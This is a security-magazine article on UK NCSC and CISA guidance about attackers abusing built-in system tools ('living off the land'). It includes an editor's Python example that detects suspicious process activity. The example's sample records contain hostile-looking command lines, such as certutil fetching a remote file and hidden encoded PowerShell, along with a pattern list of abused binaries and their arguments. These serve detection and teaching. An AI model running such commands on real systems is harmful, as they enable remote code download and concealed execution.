‘Living Off The Land’ guidance

by Mark Rowe

Cyber attackers may use sophisticated techniques to camouflage their activity on victims’ networks, says the UK’s National Cyber Security Centre (NCSC) in a warning to UK critical infrastructure operators.

Threat actors have been abusing legitimate tools and processes already present on the systems they compromise to gain persistent access and avoid detection, says the NCSC. This kind of tradecraft, known as ‘living off the land’, lets attackers operate discreetly: their activity is carried out by the same binaries, accounts and protocols that administrators use, so it blends into legitimate system and network behaviour and is difficult to tell apart from it – even for organisations with more mature security postures.

The NCSC assesses that it is likely this type of activity poses a threat to UK critical national infrastructure, and so all providers are urged to follow the recommended actions to help detect compromises and mitigate vulnerabilities. The joint guidance, ‘Identifying and Mitigating Living Off The Land’, is published on the website of the United States federal Cybersecurity and Infrastructure Security Agency (CISA).
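What ‘detecting compromises’ looks like in practice is the part the press summary leaves out. The block below is an added worked example from the editor, not code from the NCSC, CISA or the guidance itself. It runs two of the detection ideas the guidance relies on over a batch of process-creation records: first, argument patterns that are rarely legitimate for commonly abused native binaries; second, a per-host baseline of parent-to-child process lineages, so that a familiar tool launched from an unfamiliar parent stands out even when its arguments look harmless. All records, hostnames, user names, paths, the IP address and the argument patterns are constructed placeholders chosen for the example; the record layout is modelled on what Windows Security event 4688 (with command-line auditing enabled) or Sysmon event ID 1 provide.

```python
"""Toy living-off-the-land detector (editor's example, not NCSC/CISA code).

Two signals are combined over process-creation records:
  1. argument patterns typical of abused native binaries (so-called LOLBins);
  2. parent -> child lineage never seen on that host during a clean baseline period.
Either signal alone is noisy; both together is a strong hunting lead.
"""
import re

# Constructed sample records (hand-written for this example, not real telemetry).
# Tuple layout mirrors Windows Security event 4688 / Sysmon event ID 1 fields:
# host, user, parent image, image, command line. Hosts, users, paths and the
# IP address are placeholders.
BASELINE_EVENTS = [
    ("WS01", r"corp\alice", r"C:\Windows\explorer.exe",
     r"C:\Program Files\Office\winword.exe", "winword.exe /n"),
    ("WS01", r"corp\alice", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ("WS01", r"corp\alice", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ("WS01", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\services.exe",
     r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ("DC01", r"corp\admin", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\backup.ps1"),
]

NEW_EVENTS = [
    # benign: known lineage, harmless arguments
    ("WS01", r"corp\alice", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    # both signals: Word spawning certutil to fetch a remote file
    ("WS01", r"corp\alice", r"C:\Program Files\Office\winword.exe",
     r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt"),
    # arguments only: familiar lineage, but hidden window plus encoded command
    ("WS01", r"corp\alice", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -W Hidden -enc SQBFAFgA"),
    # lineage only: PowerShell launched via WMI on a workstation, plain arguments
    ("WS01", r"corp\svc_monitor", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\temp\run.ps1"),
    # benign: the scheduled backup exactly as seen in the baseline
    ("DC01", r"corp\admin", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\backup.ps1"),
]

# Argument patterns that are rarely legitimate for these native binaries.
# Keyed by image basename; illustrative, not an exhaustive LOLBin catalogue.
SUSPICIOUS_ARGS = {
    "certutil.exe":   re.compile(r"-urlcache|-decode|-encode", re.I),
    "mshta.exe":      re.compile(r"https?://|javascript:|vbscript:", re.I),
    "regsvr32.exe":   re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "rundll32.exe":   re.compile(r"javascript:|https?://", re.I),
    "wmic.exe":       re.compile(r"process\s+call\s+create|/node:", re.I),
    "bitsadmin.exe":  re.compile(r"/transfer", re.I),
    "powershell.exe": re.compile(
        r"-e(c|nc|ncoded|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|"
        r"downloadstring|downloadfile|invoke-expression|\biex\b", re.I),
}


def basename(path):
    """Lower-cased file name of a Windows path (sufficient for the sample records)."""
    return path.rsplit("\\", 1)[-1].lower()


def build_baseline(events):
    """Set of (host, parent, image) lineages observed during a clean period."""
    return {(host, basename(parent), basename(image))
            for host, _user, parent, image, _cmd in events}


def score_event(event, baseline):
    """Return an alert dict for one record, or None if neither signal fired."""
    host, user, parent, image, cmdline = event
    par, img = basename(parent), basename(image)
    reasons = []
    pattern = SUSPICIOUS_ARGS.get(img)
    if pattern and pattern.search(cmdline):
        reasons.append(f"suspicious arguments for {img}")
    if (host, par, img) not in baseline:
        reasons.append(f"lineage {par} -> {img} never seen on {host}")
    if not reasons:
        return None
    return {
        "host": host, "user": user, "parent": par, "image": img,
        "cmdline": cmdline, "reasons": reasons,
        # both signals together are far more specific than either alone
        "severity": "high" if len(reasons) == 2 else "medium",
    }


def detect(events, baseline):
    """Run score_event over a batch and keep only the records that fired."""
    return [a for a in (score_event(e, baseline) for e in events) if a]


if __name__ == "__main__":
    for alert in detect(NEW_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(alert["severity"].upper(), alert["host"], alert["cmdline"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

Two points for anyone adapting this: the arguments are only available if command-line logging is actually switched on (for event 4688 that means enabling ‘Include command line in process creation events’ in Group Policy; Sysmon records it by default), and the baseline must be built per host from a period you have reason to believe was clean, otherwise an attacker who was already present simply becomes part of ‘normal’.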

Paul Chichester, NCSC Director of Operations, said: “It is vital that operators of UK critical infrastructure heed this warning about cyber attackers using sophisticated techniques to hide on victims’ systems. Threat actors left to carry out their operations undetected present a persistent and potentially very serious threat to the provision of essential services.

“Organisations should apply the protections set out in the latest guidance to help hunt down and mitigate any malicious activity found on their networks.”


Sylvain Cortes, VP Strategy, Hackuity says: “Critical national infrastructure (CNI) remains a priority target for attackers, but the ‘living off the land’ (LOTL) technique, which the NCSC’s latest joint advisory warns of, seems to be on the rise – attackers can move around a network in a similar way to legitimate users. This type of attack poses a significant threat to UK CNI. The attackers’ aim is simple: to cause maximum disruption whilst flying under the radar of detection.

“I strongly advise organisations to apply the defence principles laid out in the latest guidance by the NCSC, which suggests protection best practices such as detailed logging of all activity and machine-learning automation to review the logs for anomalies, to target any malicious activity found on their networks. Prevention is always better than cure, so having vulnerability management in place will help teams identify their specific weaknesses, accelerate targeted remediation and greatly reduce the chances of an unwelcome visitor lurking in the shadows of their network.”


© 2024 Professional Security Magazine. All rights reserved.